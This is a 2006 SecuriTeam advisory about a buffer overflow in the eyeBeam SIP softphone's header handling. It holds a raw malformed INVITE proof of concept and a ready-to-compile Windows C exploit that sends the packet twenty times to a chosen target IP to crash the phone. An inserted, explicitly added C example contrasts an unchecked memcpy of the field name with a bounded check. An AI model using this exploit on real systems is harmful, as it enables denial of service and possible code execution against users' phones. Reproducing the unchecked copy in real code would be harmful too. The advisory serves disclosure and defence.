[NT] CounterPath eyeBeam SIP Buffer Overflow

Subject: [NT] CounterPath eyeBeam SIP Buffer Overflow
Date: 25 Jan 2006 10:01:51 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  CounterPath eyeBeam SIP Buffer Overflow
------------------------------------------------------------------------


SUMMARY

 <http://www.xten.net/index.php?menu=eyeBeam> eyeBeam is a SIP softphone 
supporting open standards for VoIP, Video and Instant Messaging.

CounterPath eyeBeam does not handle SIP headers correctly, allowing attackers 
to crash the application and potentially execute arbitrary code through a 
buffer overflow.

DETAILS

Vulnerable Systems:
 * eyeBeam version 1.1

A buffer overflow exists in eyeBeam's handling of a SIP header whose field 
name is overly long.

Proof of Concept:
INVITE sip:a@127.0.0.1 SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119
From: 1249 <sip:a@127.0.0.1>;tag=1249
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Receiver <sip:100012@172.16.1.1>
Call-ID: 4166@<172.16.3.6>   <-- change this to the target IP
CSeq: 18571 INVITE
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 130

v=0
o=1249 1249 1249 IN IP4 127.0.0.1
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000

If an attacker sends the packet several times while eyeBeam is starting up 
and has no call in progress, eyeBeam crashes on a read from an invalid 
address that the attacker controls.

If the attacker sends it several times while eyeBeam is in a call, eyeBeam 
stops responding to dialing and to incoming calls, and may crash on a write 
to an invalid address, which may also allow execution of arbitrary code.
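The overflow described above is the classic pattern of copying a header field 
name into a fixed-size buffer without checking its length. The C below is an 
added example, not code from the advisory, from ZwelL or from CounterPath: it 
shows that unsafe pattern beside a bounded header-line check, and runs a 
reconstruction of the advisory's INVITE (a constructed input, body omitted) 
through the check with field names of several lengths. The 64-byte NAME_MAX, 
the function names, the header-count return value and the RFC 3261 token 
check are assumptions made for illustration; they are not taken from eyeBeam.

```c
/* Added example, not part of the advisory: the unsafe "copy the field name
 * into a fixed buffer" pattern beside a bounded check, run over a
 * reconstruction of the advisory's INVITE. NAME_MAX, the function names and
 * the constructed messages are illustrative assumptions, not eyeBeam code. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX 64   /* assumed size of the fixed field-name buffer */

/* Vulnerable pattern: copies everything before the colon into a fixed
 * NAME_MAX-byte buffer with no length check. A field name of 128 'a's, as in
 * the PoC, writes past the end of out[] and corrupts the caller's stack. */
static void header_name_unsafe(const char *line, char *out)
{
    const char *colon = strchr(line, ':');
    size_t n = colon ? (size_t)(colon - line) : strlen(line);
    memcpy(out, line, n);          /* no bound on n */
    out[n] = '\0';
}

/* Hardened form: fills out[] and returns 0 only if the field name is a
 * non-empty RFC 3261 token that fits in outsz bytes and is followed by ':';
 * otherwise returns -1 without writing past out[outsz-1]. */
static int header_name_safe(const char *line, char *out, size_t outsz)
{
    const char *colon = strchr(line, ':');
    size_t n, i;
    if (!colon) return -1;
    n = (size_t)(colon - line);
    if (n == 0 || n >= outsz) return -1;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)line[i];
        if (!isalnum(c) && !strchr("-.!%*_+`'~", c)) return -1;
    }
    memcpy(out, line, n);
    out[n] = '\0';
    return 0;
}

/* Walks the header section of a SIP request (request line, then one header
 * per CRLF line, up to the blank line). Returns the number of headers
 * accepted, or -1 as soon as one fails header_name_safe(). Folded
 * continuation lines (leading SP/HTAB) belong to the previous header. */
static int check_sip_headers(const char *msg)
{
    const char *p = strstr(msg, "\r\n");
    int count = 0;
    if (!p) return -1;
    p += 2;
    while (*p && strncmp(p, "\r\n", 2) != 0) {
        const char *eol = strstr(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        char line[512], name[NAME_MAX];
        if (*p != ' ' && *p != '\t') {
            if (len >= sizeof line) return -1;
            memcpy(line, p, len);
            line[len] = '\0';
            if (header_name_safe(line, name, sizeof name) != 0) return -1;
            count++;
        }
        if (!eol) break;
        p = eol + 2;
    }
    return count;
}

/* Builds the advisory's PoC INVITE with a field name of name_len 'a' bytes
 * (constructed input; the SDP body is omitted since only headers matter
 * here) and runs it through check_sip_headers(). */
static int check_poc(size_t name_len)
{
    char msg[1024], name[512];
    if (name_len >= sizeof name) return -1;
    memset(name, 'a', name_len);
    name[name_len] = '\0';
    snprintf(msg, sizeof msg,
        "INVITE sip:a@127.0.0.1 SIP/2.0\r\n"
        "Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119\r\n"
        "From: 1249 <sip:a@127.0.0.1>;tag=1249\r\n"
        "%s: Receiver <sip:100012@172.16.1.1>\r\n"
        "Call-ID: 4166@172.16.3.6\r\n"
        "CSeq: 18571 INVITE\r\n"
        "Expires: 1200\r\n"
        "Max-Forwards: 70\r\n"
        "Content-Type: application/sdp\r\n"
        "Content-Length: 0\r\n"
        "\r\n", name);
    return check_sip_headers(msg);
}

int main(void)
{
    char nm[NAME_MAX];
    /* Safe on a well-formed line; feeding it the PoC's 128-byte field name
     * would overrun nm[] and smash this frame, which is the advisory's bug. */
    header_name_unsafe("CSeq: 18571 INVITE", nm);
    printf("unsafe parser read field name \"%s\"\n", nm);
    printf("PoC with an 8-byte name  -> %d headers accepted\n", check_poc(8));
    printf("PoC with a 128-byte name -> %d (rejected)\n", check_poc(128));
    return 0;
}
```

The PoC message passes the bounded check with an 8-byte or 63-byte field 
name and is rejected at 64 bytes and above; the unsafe routine is only ever 
called on a short, well-formed line, because calling it on the PoC line is 
exactly the stack overrun the advisory reports.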

Exploit:
/*********************************************************
eyeBeam handling SIP header DOS POC
Author : ZwelL
Email : zwell@sohu.com
Blog : http://www.donews.net/zwell
Date : 2006.1.15
*********************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32")

/* First part of the INVITE: request line, Via, From, and then the header
 * whose 128-byte field name ("aaaa...") triggers the overflow. */
const char *sendbuf1 =
"INVITE sip:a@127.0.0.1 SIP/2.0\r\n"
"Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119\r\n"
"From: test <sip:a@127.0.0.1>;tag=1249\r\n"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaa: test <sip:a@127.0.0.1>\r\n";

/* Remaining headers and the SDP body; the Call-ID header carrying the
 * target IP is inserted between the two parts in main(). */
const char *sendbuf2 =
"CSeq: 18571 INVITE\r\n"
"Expires: 1200\r\n"
"Max-Forwards: 70\r\n"
"Content-Type: application/sdp\r\n"
"Content-Length: 130\r\n"
"\r\n"
"v=0\r\n"
"o=1249 1249 1249 IN IP4 127.0.0.1\r\n"
"s=Session SDP\r\n"
"c=IN IP4 127.0.0.1\r\n"
"t=0 0\r\n"
"m=audio 9876 RTP/AVP 0\r\n"
"a=rtpmap:0 PCMU/8000\r\n";

int main(int argc, char **argv)
{
    WSADATA wsaData;
    SOCKET sock;
    struct sockaddr_in RecvAddr;
    char sendbuf[4096];
    int iResult;
    int i;
    int port = 8376; /* eyeBeam's default port is 8376; SIP's default port is 5060 */

    printf("eyeBeam handling SIP header DOS POC\nAuthor : ZwelL\n");
    printf("Email : zwell@sohu.com\nBlog : http://www.donews.net/zwell\n\n");
    if (argc < 2)
    {
        printf("Usage : %s <target ip> [port]\n", argv[0]);
        return 0;
    }

    if (argc == 3)
        port = atoi(argv[2]);

    iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    if (iResult != NO_ERROR)
    {
        printf("Error at WSAStartup()\n");
        return 0;
    }

    sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (sock == INVALID_SOCKET)
    {
        printf("socket() failed:%d\n", WSAGetLastError());
        WSACleanup();
        return 0;
    }

    ZeroMemory(&RecvAddr, sizeof(RecvAddr));
    RecvAddr.sin_family = AF_INET;
    RecvAddr.sin_port = htons((short)port);
    RecvAddr.sin_addr.s_addr = inet_addr(argv[1]);

    printf("Target is : %s\t port is : %d\r\n", argv[1], port);
    /* The crash needs the packet repeated, so send the same INVITE 20 times. */
    for (i = 0; i < 20; i++)
    {
        sprintf(sendbuf, "%sCall-ID: 4166@<%s>\r\n%s", sendbuf1, argv[1], sendbuf2);
        if (SOCKET_ERROR == sendto(sock, sendbuf, strlen(sendbuf), 0,
                                   (SOCKADDR *) &RecvAddr, sizeof(RecvAddr)))
        {
            printf("sendto wrong:%d\n", WSAGetLastError());
            continue;
        }
    }

    printf("Now check whether the target crashed.\r\n");

    closesocket(sock);
    WSACleanup();
    return 0;
}

/* EoF */


ADDITIONAL INFORMATION

The information has been provided by <mailto:zwell@sohu.com> ZwelL.
The original article can be found at:
http://blog.donews.com/zwell/archive/2006/01/17/698810.aspx


